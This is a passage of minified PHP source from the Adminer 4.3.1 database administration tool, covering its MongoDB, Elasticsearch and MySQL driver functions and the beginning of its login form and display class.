indexes($R,$h=null){global$g;$J=array();foreach($g->_db->selectCollection($R)->getIndexInfo()as$v){$Qb=array();foreach($v["key"]as$d=>$U)$Qb[]=($U==-1?'1':null);$J[$v["name"]]=array("type"=>($v["name"]=="_id_"?"PRIMARY":($v["unique"]?"UNIQUE":"INDEX")),"columns"=>array_keys($v["key"]),"lengths"=>array(),"descs"=>$Qb,);}return$J;}function
fields($R){return
fields_from_edit();}function
convert_field($o){}function
unconvert_field($o,$J){return$J;}function
foreign_keys($R){return
array();}function
fk_support($S){}function
engines(){return
array();}function
found_rows($S,$Z){global$g;return$g->_db->selectCollection($_GET["select"])->count($Z);}function
alter_table($R,$C,$p,$Rc,$sb,$oc,$nb,$La,$wf){global$g;if($R==""){$g->_db->createCollection($C);return
true;}}function
drop_tables($T){global$g;foreach($T
as$R){$kg=$g->_db->selectCollection($R)->drop();if(!$kg['ok'])return
false;}return
true;}function
truncate_tables($T){global$g;foreach($T
as$R){$kg=$g->_db->selectCollection($R)->remove();if(!$kg['ok'])return
false;}return
true;}function
alter_indexes($R,$c){global$g;foreach($c
as$X){list($U,$C,$O)=$X;if($O=="DROP")$J=$g->_db->command(array("deleteIndexes"=>$R,"index"=>$C));else{$e=array();foreach($O
as$d){$d=preg_replace('~ DESC$~','',$d,1,$Bb);$e[$d]=($Bb?-1:1);}$J=$g->_db->selectCollection($R)->ensureIndex($e,array("unique"=>($U=="UNIQUE"),"name"=>$C,));}if($J['errmsg']){$g->error=$J['errmsg'];return
false;}}return
true;}function
last_id(){global$g;return$g->last_id;}function
table($u){return$u;}function
idf_escape($u){return$u;}function
support($Gc){return
preg_match("~database|indexes~",$Gc);}$x="mongo";$Ye=array("=");$Zc=array();$ed=array();$gc=array(array("json"));}$Yb["elastic"]="Elasticsearch (beta)";if(isset($_GET["elastic"])){$Hf=array("json");define("DRIVER","elastic");if(function_exists('json_decode')){class
Min_DB{var$extension="JSON",$server_info,$errno,$error,$_url;function
rootQuery($zf,$xb=array(),$ye='GET'){@ini_set('track_errors',1);$Jc=@file_get_contents($this->_url.'/'.ltrim($zf,'/'),false,stream_context_create(array('http'=>array('method'=>$ye,'content'=>json_encode($xb),'ignore_errors'=>1,))));if(!$Jc){$this->error=$php_errormsg;return$Jc;}if(!preg_match('~^HTTP/[0-9.]+ 2~i',$http_response_header[0])){$this->error=$Jc;return
false;}$J=json_decode($Jc,true);if($J===null){$this->errno=json_last_error();if(function_exists('json_last_error_msg'))$this->error=json_last_error_msg();else{$wb=get_defined_constants(true);foreach($wb['json']as$C=>$Y){if($Y==$this->errno&&preg_match('~^JSON_ERROR_~',$C)){$this->error=$C;break;}}}}return$J;}function
query($zf,$xb=array(),$ye='GET'){return$this->rootQuery(($this->_db!=""?"$this->_db/":"/").ltrim($zf,'/'),$xb,$ye);}function
connect($N,$V,$G){preg_match('~^(https?://)?(.*)~',$N,$B);$this->_url=($B[1]?$B[1]:"http://")."$V:$G@$B[2]/";$J=$this->query('');if($J)$this->server_info=$J['version']['number'];return(bool)$J;}function
select_db($k){$this->_db=$k;return
true;}function
quote($Q){return$Q;}}class
Min_Result{var$num_rows,$_rows;function
__construct($L){$this->num_rows=count($this->_rows);$this->_rows=$L;reset($this->_rows);}function
fetch_assoc(){$J=current($this->_rows);next($this->_rows);return$J;}function
fetch_row(){return
array_values($this->fetch_assoc());}}}class
Min_Driver
extends
Min_SQL{function
select($R,$M,$Z,$cd,$df=array(),$z=1,$E=0,$Mf=false){global$b;$Gb=array();$H="$R/_search";if($M!=array("*"))$Gb["fields"]=$M;if($df){$Pg=array();foreach($df
as$lb){$lb=preg_replace('~ DESC$~','',$lb,1,$Bb);$Pg[]=($Bb?array($lb=>"desc"):$lb);}$Gb["sort"]=$Pg;}if($z){$Gb["size"]=+$z;if($E)$Gb["from"]=($E*$z);}foreach($Z
as$X){list($lb,$We,$X)=explode(" ",$X,3);if($lb=="_id")$Gb["query"]["ids"]["values"][]=$X;elseif($lb.$X!=""){$rh=array("term"=>array(($lb!=""?$lb:"_all")=>$X));if($We=="=")$Gb["query"]["filtered"]["filter"]["and"][]=$rh;else$Gb["query"]["filtered"]["query"]["bool"]["must"][]=$rh;}}if($Gb["query"]&&!$Gb["query"]["filtered"]["query"]&&!$Gb["query"]["ids"])$Gb["query"]["filtered"]["query"]=array("match_all"=>array());$Vg=microtime(true);$zg=$this->_conn->query($H,$Gb);if($Mf)echo$b->selectQuery("$H: ".print_r($Gb,true),format_time($Vg));if(!$zg)return
false;$J=array();foreach($zg['hits']['hits']as$ld){$K=array();if($M==array("*"))$K["_id"]=$ld["_id"];$p=$ld['_source'];if($M!=array("*")){$p=array();foreach($M
as$y)$p[$y]=$ld['fields'][$y];}foreach($p
as$y=>$X){if($Gb["fields"])$X=$X[0];$K[$y]=(is_array($X)?json_encode($X):$X);}$J[]=$K;}return
new
Min_Result($J);}}function
connect(){global$b;$g=new
Min_DB;$j=$b->credentials();if($g->connect($j[0],$j[1],$j[2]))return$g;return$g->error;}function
support($Gc){return
preg_match("~database|table|columns~",$Gc);}function
logged_user(){global$b;$j=$b->credentials();return$j[1];}function
get_databases(){global$g;$J=$g->rootQuery('_aliases');if($J){$J=array_keys($J);sort($J,SORT_STRING);}return$J;}function
collations(){return
array();}function
db_collation($m,$ob){}function
engines(){return
array();}function
count_tables($l){global$g;$J=$g->query('_mapping');if($J)$J=array_map('count',$J);return$J;}function
tables_list(){global$g;$J=$g->query('_mapping');if($J)$J=array_fill_keys(array_keys($J[$g->_db]["mappings"]),'table');return$J;}function
table_status($C="",$Fc=false){global$g;$zg=$g->query("_search?search_type=count",array("facets"=>array("count_by_type"=>array("terms"=>array("field"=>"_type",)))),"POST");$J=array();if($zg){foreach($zg["facets"]["count_by_type"]["terms"]as$R){$J[$R["term"]]=array("Name"=>$R["term"],"Engine"=>"table","Rows"=>$R["count"],);if($C!=""&&$C==$R["term"])return$J[$C];}}return$J;}function
error(){global$g;return
h($g->error);}function
information_schema(){}function
is_view($S){}function
indexes($R,$h=null){return
array(array("type"=>"PRIMARY","columns"=>array("_id")),);}function
fields($R){global$g;$I=$g->query("$R/_mapping");$J=array();if($I){$he=$I[$R]['properties'];if(!$he)$he=$I[$g->_db]['mappings'][$R]['properties'];if($he){foreach($he
as$C=>$o){$J[$C]=array("field"=>$C,"full_type"=>$o["type"],"type"=>$o["type"],"privileges"=>array("insert"=>1,"select"=>1,"update"=>1),);if($o["properties"]){unset($J[$C]["privileges"]["insert"]);unset($J[$C]["privileges"]["update"]);}}}}return$J;}function
foreign_keys($R){return
array();}function
table($u){return$u;}function
idf_escape($u){return$u;}function
convert_field($o){}function
unconvert_field($o,$J){return$J;}function
fk_support($S){}function
found_rows($S,$Z){return
null;}function
create_database($m){global$g;return$g->rootQuery(urlencode($m),array(),'PUT');}function
drop_databases($l){global$g;return$g->rootQuery(urlencode(implode(',',$l)),array(),'DELETE');}function
drop_tables($T){global$g;$J=true;foreach($T
as$R)$J=$J&&$g->query(urlencode($R),array(),'DELETE');return$J;}$x="elastic";$Ye=array("=","query");$Zc=array();$ed=array();$gc=array(array("json"));}$Yb=array("server"=>"MySQL")+$Yb;if(!defined("DRIVER")){$Hf=array("MySQLi","MySQL","PDO_MySQL");define("DRIVER","server");if(extension_loaded("mysqli")){class
Min_DB
extends
MySQLi{var$extension="MySQLi";function
__construct(){parent::init();}function
connect($N="",$V="",$G="",$k=null,$Df=null,$Og=null){mysqli_report(MYSQLI_REPORT_OFF);list($md,$Df)=explode(":",$N,2);$J=@$this->real_connect(($N!=""?$md:ini_get("mysqli.default_host")),($N.$V!=""?$V:ini_get("mysqli.default_user")),($N.$V.$G!=""?$G:ini_get("mysqli.default_pw")),$k,(is_numeric($Df)?$Df:ini_get("mysqli.default_port")),(!is_numeric($Df)?$Df:$Og));return$J;}function
set_charset($ab){if(parent::set_charset($ab))return
true;parent::set_charset('utf8');return$this->query("SET NAMES $ab");}function
result($H,$o=0){$I=$this->query($H);if(!$I)return
false;$K=$I->fetch_array();return$K[$o];}function
quote($Q){return"'".$this->escape_string($Q)."'";}}}elseif(extension_loaded("mysql")&&!(ini_get("sql.safe_mode")&&extension_loaded("pdo_mysql"))){class
Min_DB{var$extension="MySQL",$server_info,$affected_rows,$errno,$error,$_link,$_result;function
connect($N,$V,$G){$this->_link=@mysql_connect(($N!=""?$N:ini_get("mysql.default_host")),("$N$V"!=""?$V:ini_get("mysql.default_user")),("$N$V$G"!=""?$G:ini_get("mysql.default_password")),true,131072);if($this->_link)$this->server_info=mysql_get_server_info($this->_link);else$this->error=mysql_error();return(bool)$this->_link;}function
set_charset($ab){if(function_exists('mysql_set_charset')){if(mysql_set_charset($ab,$this->_link))return
true;mysql_set_charset('utf8',$this->_link);}return$this->query("SET NAMES $ab");}function
quote($Q){return"'".mysql_real_escape_string($Q,$this->_link)."'";}function
select_db($k){return
mysql_select_db($k,$this->_link);}function
query($H,$Sh=false){$I=@($Sh?mysql_unbuffered_query($H,$this->_link):mysql_query($H,$this->_link));$this->error="";if(!$I){$this->errno=mysql_errno($this->_link);$this->error=mysql_error($this->_link);return
false;}if($I===true){$this->affected_rows=mysql_affected_rows($this->_link);$this->info=mysql_info($this->_link);return
true;}return
new
Min_Result($I);}function
multi_query($H){return$this->_result=$this->query($H);}function
store_result(){return$this->_result;}function
next_result(){return
false;}function
result($H,$o=0){$I=$this->query($H);if(!$I||!$I->num_rows)return
false;return
mysql_result($I->_result,0,$o);}}class
Min_Result{var$num_rows,$_result,$_offset=0;function
__construct($I){$this->_result=$I;$this->num_rows=mysql_num_rows($I);}function
fetch_assoc(){return
mysql_fetch_assoc($this->_result);}function
fetch_row(){return
mysql_fetch_row($this->_result);}function
fetch_field(){$J=mysql_fetch_field($this->_result,$this->_offset++);$J->orgtable=$J->table;$J->orgname=$J->name;$J->charsetnr=($J->blob?63:0);return$J;}function
__destruct(){mysql_free_result($this->_result);}}}elseif(extension_loaded("pdo_mysql")){class
Min_DB
extends
Min_PDO{var$extension="PDO_MySQL";function
connect($N,$V,$G){$this->dsn("mysql:charset=utf8;host=".str_replace(":",";unix_socket=",preg_replace('~:(\\d)~',';port=\\1',$N)),$V,$G);return
true;}function
set_charset($ab){$this->query("SET NAMES $ab");}function
select_db($k){return$this->query("USE ".idf_escape($k));}function
query($H,$Sh=false){$this->setAttribute(1000,!$Sh);return
parent::query($H,$Sh);}}}class
Min_Driver
extends
Min_SQL{function
insert($R,$O){return($O?parent::insert($R,$O):queries("INSERT INTO ".table($R)." ()\nVALUES ()"));}function
insertUpdate($R,$L,$Kf){$e=array_keys(reset($L));$If="INSERT INTO ".table($R)." (".implode(", ",$e).") VALUES\n";$ji=array();foreach($e
as$y)$ji[$y]="$y = VALUES($y)";$bh="\nON DUPLICATE KEY UPDATE ".implode(", ",$ji);$ji=array();$be=0;foreach($L
as$O){$Y="(".implode(", ",$O).")";if($ji&&(strlen($If)+$be+strlen($Y)+strlen($bh)>1e6)){if(!queries($If.implode(",\n",$ji).$bh))return
false;$ji=array();$be=0;}$ji[]=$Y;$be+=strlen($Y)+2;}return
queries($If.implode(",\n",$ji).$bh);}}function
idf_escape($u){return"`".str_replace("`","``",$u)."`";}function
table($u){return
idf_escape($u);}function
connect(){global$b,$Rh,$Yg;$g=new
Min_DB;$j=$b->credentials();if($g->connect($j[0],$j[1],$j[2])){$g->set_charset(charset($g));$g->query("SET sql_quote_show_create = 1, autocommit = 1");if(version_compare($g->server_info,'5.7.8')>=0){$Yg[lang(23)][]="json";$Rh["json"]=4294967295;}return$g;}$J=$g->error;if(function_exists('iconv')&&!is_utf8($J)&&strlen($vg=iconv("windows-1250","utf-8",$J))>strlen($J))$J=$vg;return$J;}function
get_databases($Qc){global$g;$J=get_session("dbs");if($J===null){$H=($g->server_info>=5?"SELECT SCHEMA_NAME FROM information_schema.SCHEMATA":"SHOW DATABASES");$J=($Qc?slow_query($H):get_vals($H));restart_session();set_session("dbs",$J);stop_session();}return$J;}function
limit($H,$Z,$z,$D=0,$Dg=" "){return" $H$Z".($z!==null?$Dg."LIMIT $z".($D?" OFFSET $D":""):"");}function
limit1($H,$Z){return
limit($H,$Z,1);}function
db_collation($m,$ob){global$g;$J=null;$i=$g->result("SHOW CREATE DATABASE ".idf_escape($m),1);if(preg_match('~ COLLATE ([^ ]+)~',$i,$B))$J=$B[1];elseif(preg_match('~ CHARACTER SET ([^ ]+)~',$i,$B))$J=$ob[$B[1]][-1];return$J;}function
engines(){$J=array();foreach(get_rows("SHOW ENGINES")as$K){if(preg_match("~YES|DEFAULT~",$K["Support"]))$J[]=$K["Engine"];}return$J;}function
logged_user(){global$g;return$g->result("SELECT USER()");}function
tables_list(){global$g;return
get_key_vals($g->server_info>=5?"SELECT TABLE_NAME, TABLE_TYPE FROM information_schema.TABLES WHERE TABLE_SCHEMA = DATABASE() ORDER BY TABLE_NAME":"SHOW TABLES");}function
count_tables($l){$J=array();foreach($l
as$m)$J[$m]=count(get_vals("SHOW TABLES IN ".idf_escape($m)));return$J;}function
table_status($C="",$Fc=false){global$g;$J=array();foreach(get_rows($Fc&&$g->server_info>=5?"SELECT TABLE_NAME AS Name, ENGINE AS Engine, TABLE_COMMENT AS Comment FROM information_schema.TABLES WHERE TABLE_SCHEMA = DATABASE() ".($C!=""?"AND TABLE_NAME = ".q($C):"ORDER BY Name"):"SHOW TABLE STATUS".($C!=""?" LIKE ".q(addcslashes($C,"%_\\")):""))as$K){if($K["Engine"]=="InnoDB")$K["Comment"]=preg_replace('~(?:(.+); )?InnoDB free: .*~','\\1',$K["Comment"]);if(!isset($K["Engine"]))$K["Comment"]="";if($C!="")return$K;$J[$K["Name"]]=$K;}return$J;}function
is_view($S){return$S["Engine"]===null;}function
fk_support($S){global$g;return
preg_match('~InnoDB|IBMDB2I~i',$S["Engine"])||(preg_match('~NDB~i',$S["Engine"])&&version_compare($g->server_info,'5.6')>=0);}function
fields($R){$J=array();foreach(get_rows("SHOW FULL COLUMNS FROM ".table($R))as$K){preg_match('~^([^( ]+)(?:\\((.+)\\))?( unsigned)?( zerofill)?$~',$K["Type"],$B);$J[$K["Field"]]=array("field"=>$K["Field"],"full_type"=>$K["Type"],"type"=>$B[1],"length"=>$B[2],"unsigned"=>ltrim($B[3].$B[4]),"default"=>($K["Default"]!=""||preg_match("~char|set~",$B[1])?$K["Default"]:null),"null"=>($K["Null"]=="YES"),"auto_increment"=>($K["Extra"]=="auto_increment"),"on_update"=>(preg_match('~^on update (.+)~i',$K["Extra"],$B)?$B[1]:""),"collation"=>$K["Collation"],"privileges"=>array_flip(preg_split('~, *~',$K["Privileges"])),"comment"=>$K["Comment"],"primary"=>($K["Key"]=="PRI"),);}return$J;}function
indexes($R,$h=null){$J=array();foreach(get_rows("SHOW INDEX FROM ".table($R),$h)as$K){$C=$K["Key_name"];$J[$C]["type"]=($C=="PRIMARY"?"PRIMARY":($K["Index_type"]=="FULLTEXT"?"FULLTEXT":($K["Non_unique"]?($K["Index_type"]=="SPATIAL"?"SPATIAL":"INDEX"):"UNIQUE")));$J[$C]["columns"][]=$K["Column_name"];$J[$C]["lengths"][]=($K["Index_type"]=="SPATIAL"?null:$K["Sub_part"]);$J[$C]["descs"][]=null;}return$J;}function
foreign_keys($R){global$g,$Te;static$Af='`(?:[^`]|``)+`';$J=array();$Cb=$g->result("SHOW CREATE TABLE ".table($R),1);if($Cb){preg_match_all("~CONSTRAINT ($Af) FOREIGN KEY ?\\(((?:$Af,? ?)+)\\) REFERENCES ($Af)(?:\\.($Af))? \\(((?:$Af,? ?)+)\\)(?: ON DELETE ($Te))?(?: ON UPDATE ($Te))?~",$Cb,$ke,PREG_SET_ORDER);foreach($ke
as$B){preg_match_all("~$Af~",$B[2],$Qg);preg_match_all("~$Af~",$B[5],$oh);$J[idf_unescape($B[1])]=array("db"=>idf_unescape($B[4]!=""?$B[3]:$B[4]),"table"=>idf_unescape($B[4]!=""?$B[4]:$B[3]),"source"=>array_map('idf_unescape',$Qg[0]),"target"=>array_map('idf_unescape',$oh[0]),"on_delete"=>($B[6]?$B[6]:"RESTRICT"),"on_update"=>($B[7]?$B[7]:"RESTRICT"),);}}return$J;}function
view($C){global$g;return
array("select"=>preg_replace('~^(?:[^`]|`[^`]*`)*\\s+AS\\s+~isU','',$g->result("SHOW CREATE VIEW ".table($C),1)));}function
collations(){$J=array();foreach(get_rows("SHOW COLLATION")as$K){if($K["Default"])$J[$K["Charset"]][-1]=$K["Collation"];else$J[$K["Charset"]][]=$K["Collation"];}ksort($J);foreach($J
as$y=>$X)asort($J[$y]);return$J;}function
information_schema($m){global$g;return($g->server_info>=5&&$m=="information_schema")||($g->server_info>=5.5&&$m=="performance_schema");}function
error(){global$g;return
h(preg_replace('~^You have an error.*syntax to use~U',"Syntax error",$g->error));}function
create_database($m,$nb){return
queries("CREATE DATABASE ".idf_escape($m).($nb?" COLLATE ".q($nb):""));}function
drop_databases($l){$J=apply_queries("DROP DATABASE",$l,'idf_escape');restart_session();set_session("dbs",null);return$J;}function
rename_database($C,$nb){$J=false;if(create_database($C,$nb)){$ig=array();foreach(tables_list()as$R=>$U)$ig[]=table($R)." TO ".idf_escape($C).".".table($R);$J=(!$ig||queries("RENAME TABLE ".implode(", ",$ig)));if($J)queries("DROP DATABASE ".idf_escape(DB));restart_session();set_session("dbs",null);}return$J;}function
auto_increment(){$Ma=" PRIMARY KEY";if($_GET["create"]!=""&&$_POST["auto_increment_col"]){foreach(indexes($_GET["create"])as$v){if(in_array($_POST["fields"][$_POST["auto_increment_col"]]["orig"],$v["columns"],true)){$Ma="";break;}if($v["type"]=="PRIMARY")$Ma=" UNIQUE";}}return" AUTO_INCREMENT$Ma";}function
alter_table($R,$C,$p,$Rc,$sb,$oc,$nb,$La,$wf){$c=array();foreach($p
as$o)$c[]=($o[1]?($R!=""?($o[0]!=""?"CHANGE ".idf_escape($o[0]):"ADD"):" ")." ".implode($o[1]).($R!=""?$o[2]:""):"DROP ".idf_escape($o[0]));$c=array_merge($c,$Rc);$P=($sb!==null?" COMMENT=".q($sb):"").($oc?" ENGINE=".q($oc):"").($nb?" COLLATE ".q($nb):"").($La!=""?" AUTO_INCREMENT=$La":"");if($R=="")return
queries("CREATE TABLE ".table($C)." (\n".implode(",\n",$c)."\n)$P$wf");if($R!=$C)$c[]="RENAME TO ".table($C);if($P)$c[]=ltrim($P);return($c||$wf?queries("ALTER TABLE ".table($R)."\n".implode(",\n",$c).$wf):true);}function
alter_indexes($R,$c){foreach($c
as$y=>$X)$c[$y]=($X[2]=="DROP"?"\nDROP INDEX ".idf_escape($X[1]):"\nADD $X[0] ".($X[0]=="PRIMARY"?"KEY ":"").($X[1]!=""?idf_escape($X[1])." ":"")."(".implode(", ",$X[2]).")");return
queries("ALTER TABLE ".table($R).implode(",",$c));}function
truncate_tables($T){return
apply_queries("TRUNCATE TABLE",$T);}function
drop_views($oi){return
queries("DROP VIEW ".implode(", ",array_map('table',$oi)));}function
drop_tables($T){return
queries("DROP TABLE ".implode(", ",array_map('table',$T)));}function
move_tables($T,$oi,$oh){$ig=array();foreach(array_merge($T,$oi)as$R)$ig[]=table($R)." TO ".idf_escape($oh).".".table($R);return
queries("RENAME TABLE ".implode(", ",$ig));}function
copy_tables($T,$oi,$oh){queries("SET sql_mode = 'NO_AUTO_VALUE_ON_ZERO'");foreach($T
as$R){$C=($oh==DB?table("copy_$R"):idf_escape($oh).".".table($R));if(!queries("\nDROP TABLE IF EXISTS $C")||!queries("CREATE TABLE $C LIKE ".table($R))||!queries("INSERT INTO $C SELECT * FROM ".table($R)))return
false;}foreach($oi
as$R){$C=($oh==DB?table("copy_$R"):idf_escape($oh).".".table($R));$ni=view($R);if(!queries("DROP VIEW IF EXISTS $C")||!queries("CREATE VIEW $C AS $ni[select]"))return
false;}return
true;}function
trigger($C){if($C=="")return
array();$L=get_rows("SHOW TRIGGERS WHERE `Trigger` = ".q($C));return
reset($L);}function
triggers($R){$J=array();foreach(get_rows("SHOW TRIGGERS LIKE ".q(addcslashes($R,"%_\\")))as$K)$J[$K["Trigger"]]=array($K["Timing"],$K["Event"]);return$J;}function
trigger_options(){return
array("Timing"=>array("BEFORE","AFTER"),"Event"=>array("INSERT","UPDATE","DELETE"),"Type"=>array("FOR EACH ROW"),);}function
routine($C,$U){global$g,$qc,$yd,$Rh;$Ca=array("bool","boolean","integer","double precision","real","dec","numeric","fixed","national char","national varchar");$Qh="((".implode("|",array_merge(array_keys($Rh),$Ca)).")\\b(?:\\s*\\(((?:[^'\")]|$qc)++)\\))?\\s*(zerofill\\s*)?(unsigned(?:\\s+zerofill)?)?)(?:\\s*(?:CHARSET|CHARACTER\\s+SET)\\s*['\"]?([^'\"\\s,]+)['\"]?)?";$Af="\\s*(".($U=="FUNCTION"?"":$yd).")?\\s*(?:`((?:[^`]|``)*)`\\s*|\\b(\\S+)\\s+)$Qh";$i=$g->result("SHOW CREATE $U ".idf_escape($C),2);preg_match("~\\(((?:$Af\\s*,?)*)\\)\\s*".($U=="FUNCTION"?"RETURNS\\s+$Qh\\s+":"")."(.*)~is",$i,$B);$p=array();preg_match_all("~$Af\\s*,?~is",$B[1],$ke,PREG_SET_ORDER);foreach($ke
as$qf){$C=str_replace("``","`",$qf[2]).$qf[3];$p[]=array("field"=>$C,"type"=>strtolower($qf[5]),"length"=>preg_replace_callback("~$qc~s",'normalize_enum',$qf[6]),"unsigned"=>strtolower(preg_replace('~\\s+~',' ',trim("$qf[8] $qf[7]"))),"null"=>1,"full_type"=>$qf[4],"inout"=>strtoupper($qf[1]),"collation"=>strtolower($qf[9]),);}if($U!="FUNCTION")return
array("fields"=>$p,"definition"=>$B[11]);return
array("fields"=>$p,"returns"=>array("type"=>$B[12],"length"=>$B[13],"unsigned"=>$B[15],"collation"=>$B[16]),"definition"=>$B[17],"language"=>"SQL",);}function
routines(){return
get_rows("SELECT ROUTINE_NAME, ROUTINE_TYPE, DTD_IDENTIFIER FROM information_schema.ROUTINES WHERE ROUTINE_SCHEMA = ".q(DB));}function
routine_languages(){return
array();}function
last_id(){global$g;return$g->result("SELECT LAST_INSERT_ID()");}function
explain($g,$H){return$g->query("EXPLAIN ".($g->server_info>=5.1?"PARTITIONS ":"").$H);}function
found_rows($S,$Z){return($Z||$S["Engine"]!="InnoDB"?null:$S["Rows"]);}function
types(){return
array();}function
schemas(){return
array();}function
get_schema(){return"";}function
set_schema($xg){return
true;}function
create_sql($R,$La){global$g;$J=$g->result("SHOW CREATE TABLE ".table($R),1);if(!$La)$J=preg_replace('~ AUTO_INCREMENT=\\d+~','',$J);return$J;}function
truncate_sql($R){return"TRUNCATE ".table($R);}function
use_sql($k){return"USE ".idf_escape($k);}function
trigger_sql($R,$Zg){$J="";foreach(get_rows("SHOW TRIGGERS LIKE ".q(addcslashes($R,"%_\\")),null,"-- ")as$K)$J.="\n".($Zg=='CREATE+ALTER'?"DROP TRIGGER IF EXISTS ".idf_escape($K["Trigger"]).";;\n":"")."CREATE TRIGGER ".idf_escape($K["Trigger"])." $K[Timing] $K[Event] ON ".table($K["Table"])." FOR EACH ROW\n$K[Statement];;\n";return$J;}function
show_variables(){return
get_key_vals("SHOW VARIABLES");}function
process_list(){return
get_rows("SHOW FULL PROCESSLIST");}function
show_status(){return
get_key_vals("SHOW STATUS");}function
replication_status($U){return
get_rows("SHOW $U STATUS");}function
convert_field($o){if(preg_match("~binary~",$o["type"]))return"HEX(".idf_escape($o["field"]).")";if($o["type"]=="bit")return"BIN(".idf_escape($o["field"])." + 0)";if(preg_match("~geometry|point|linestring|polygon~",$o["type"]))return"AsWKT(".idf_escape($o["field"]).")";}function
unconvert_field($o,$J){if(preg_match("~binary~",$o["type"]))$J="UNHEX($J)";if($o["type"]=="bit")$J="CONV($J, 2, 10) + 0";if(preg_match("~geometry|point|linestring|polygon~",$o["type"]))$J="GeomFromText($J)";return$J;}function
support($Gc){global$g;return!preg_match("~scheme|sequence|type|view_trigger|materializedview".($g->server_info<5.1?"|event|partitioning".($g->server_info<5?"|routine|trigger|view":""):"")."~",$Gc);}function
kill_process($X){return
queries("KILL ".number($X));}function
connection_id(){return"SELECT CONNECTION_ID()";}function
max_connections(){global$g;return$g->result("SELECT @@max_connections");}$x="sql";$Rh=array();$Yg=array();foreach(array(lang(25)=>array("tinyint"=>3,"smallint"=>5,"mediumint"=>8,"int"=>10,"bigint"=>20,"decimal"=>66,"float"=>12,"double"=>21),lang(26)=>array("date"=>10,"datetime"=>19,"timestamp"=>19,"time"=>10,"year"=>4),lang(23)=>array("char"=>255,"varchar"=>65535,"tinytext"=>255,"text"=>65535,"mediumtext"=>16777215,"longtext"=>4294967295),lang(30)=>array("enum"=>65535,"set"=>64),lang(27)=>array("bit"=>20,"binary"=>255,"varbinary"=>65535,"tinyblob"=>255,"blob"=>65535,"mediumblob"=>16777215,"longblob"=>4294967295),lang(29)=>array("geometry"=>0,"point"=>0,"linestring"=>0,"polygon"=>0,"multipoint"=>0,"multilinestring"=>0,"multipolygon"=>0,"geometrycollection"=>0),)as$y=>$X){$Rh+=$X;$Yg[$y]=array_keys($X);}$Yh=array("unsigned","zerofill","unsigned zerofill");$Ye=array("=","<",">","<=",">=","!=","LIKE","LIKE %%","REGEXP","IN","IS NULL","NOT LIKE","NOT REGEXP","NOT IN","IS NOT NULL","SQL");$Zc=array("char_length","date","from_unixtime","lower","round","sec_to_time","time_to_sec","upper");$ed=array("avg","count","count distinct","group_concat","max","min","sum");$gc=array(array("char"=>"md5/sha1/password/encrypt/uuid","binary"=>"md5/sha1","date|time"=>"now",),array("(^|[^o])int|float|double|decimal"=>"+/-","date"=>"+ interval/- interval","time"=>"addtime/subtime","char|text"=>"concat",));}define("SERVER",$_GET[DRIVER]);define("DB",$_GET["db"]);define("ME",preg_replace('~^[^?]*/([^?]*).*~','\\1',$_SERVER["REQUEST_URI"]).'?'.(sid()?SID.'&':'').(SERVER!==null?DRIVER."=".urlencode(SERVER).'&':'').(isset($_GET["username"])?"username=".urlencode($_GET["username"]).'&':'').(DB!=""?'db='.urlencode(DB).'&'.(isset($_GET["ns"])?"ns=".urlencode($_GET["ns"])."&":""):''));$ia="4.3.1";class
Adminer{var$operators;function
name(){return"<a href='https://www.adminer.org/' target='_blank' id='h1'>Adminer</a>";}function
credentials(){return
array(SERVER,$_GET["username"],get_password());}function
permanentLogin($i=false){return
password_file($i);}function
bruteForceKey(){return$_SERVER["REMOTE_ADDR"];}function
database(){return
DB;}function
databases($Qc=true){return
get_databases($Qc);}function
schemas(){return
schemas();}function
queryTimeout(){return
5;}function
headers(){return
true;}function
head(){return
true;}function
loginForm(){global$Yb;echo'<table cellspacing="0">
<tr><th>',lang(31),'<td>',html_select("auth[driver]",$Yb,DRIVER),'<tr><th>',lang(32),'<td><input name="auth[server]" value="',h(SERVER),'" title="hostname[:port]" placeholder="localhost" autocapitalize="off">
<tr><th>',lang(33),'<td><input name="auth[username]" id="username" value="',h($_GET["username"]),'" autocapitalize="off">
<tr><th>',lang(34),'<td><input type="password" name="auth[password]">
<tr><th>',lang(35),'<td><input name="auth[db]" value="',h($_GET["db"]),'" autocapitalize="off">
</table>
<script type="text/javascript">
focus(document.getElementById(\'username\'));
</script>
',"<p><input type='submit' value='".lang(36)."'>\n",checkbox("auth[permanent]",1,$_COOKIE["adminer_permanent"],lang(37))."\n";}function
login($fe,$G){global$x;if($x=="sqlite")return
lang(38,'<code>login()</code>');return
true;}function
tableName($fh){return
h($fh["Name"]);}function
fieldName($o,$df=0){return'<span title="'.h($o["full_type"]).'">'.h($o["field"]).'</span>';}function
selectLinks($fh,$O=""){echo'<p class="links">';$ee=array("select"=>lang(39));if(support("table")||support("indexes"))$ee["table"]=lang(40);if(support("table")){if(is_view($fh))$ee["view"]=lang(41);else$ee["create"]=lang(42);}if($O!==null)$ee["edit"]=lang(43);foreach($ee
as$y=>$X)echo" <a href='".h(ME)."$y=".urlencode($fh["Name"]).($y=="edit"?$O:"")."'".bold(isset($_GET[$y])).">$X</a>";echo"\n";}function
foreignKeys($R){return
foreign_keys($R);}function
backwardKeys($R,$eh){return
array();}function
backwardKeysPrint($Oa,$K){}function
selectQuery($H,$vh){global$x;return"<p><code class='jush-$x'>".h(str_replace("\n"," ",$H))."</code> <span class='time'>($vh)</span>".(support("sql")?" <a href='".h(ME)."sql=".urlencode($H)."'>".lang(10)."</a>":"")."</p>";}function
sqlCommandQuery($H){return
shorten_utf8(trim($H),1000);}function
rowDescription($R){return"";}function
rowDescriptions($L,$Sc){return$L;}function
selectLink($X,$o){}function
selectVal($X,$_,$o,$lf){$J=($X===null?"<i>NULL</i>":(preg_match("~char|binary~",$o["type"])&&!preg_match("~var~",$o["type"])?"<code>$X</code>":$X));if(preg_match('~blob|bytea|raw|file~',$o["type"])&&!is_utf8($X))$J="<i>".lang(44,strlen($lf))."</i>";if(preg_match('~json~',$o["type"]))$J="<code class='jush-js'>$J</code>";return($_?"<a href='".h($_)."'".(is_url($_)?" rel='noreferrer'":"").">$J</a>":$J);}function
editVal($X,$o){return$X;}function
tableStructurePrint($p){echo"<table cellspacing='0'>\n","<thead><tr><th>".lang(45)."<td>".lang(46).(support("comment")?"<td>".lang(47):"")."</thead>\n";foreach($p
as$o){echo"<tr".odd()."><th>".h($o["field"]),"<td><span title='".h($o["collation"])."'>".h($o["full_type"])."</span>",($o["null"]?" <i>NULL</i>":""),($o["auto_increment"]?" <i>".lang(48)."</i>":""),(isset($o["default"])?" <span title='".lang(49)."'>[<b>".h($o["default"])."</b>]</span>":""),(support("comment")?"<td>".nbsp($o["comment"]):""),"\n";}echo"</table>\n";}function
tableIndexesPrint($w){echo"<table cellspacing='0'>\n";foreach($w
